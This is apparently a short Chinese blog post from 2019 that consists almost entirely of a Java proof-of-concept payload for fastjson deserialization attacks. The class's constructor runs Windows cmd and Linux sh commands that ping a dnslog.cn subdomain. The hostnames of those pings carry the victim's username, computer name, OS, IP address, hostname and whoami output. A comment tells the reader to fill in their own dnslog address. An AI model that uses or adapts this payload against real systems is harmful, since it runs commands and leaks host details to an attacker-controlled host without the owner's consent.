fastjson ping外带信息poc

public class Exploit {
    public Exploit(){
        String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址
        String win_dnslog = "windows" + base_url;
        // windows
        try{
            String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        
        
        // linux
        String linux_dnslog = "linux" + base_url;
        try{

            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
    }
    public static void main(String[] args){
        Exploit e = new Exploit();
    }
}
posted @ 2019-12-07 10:43  huim  阅读(900)  评论(0编辑  收藏  举报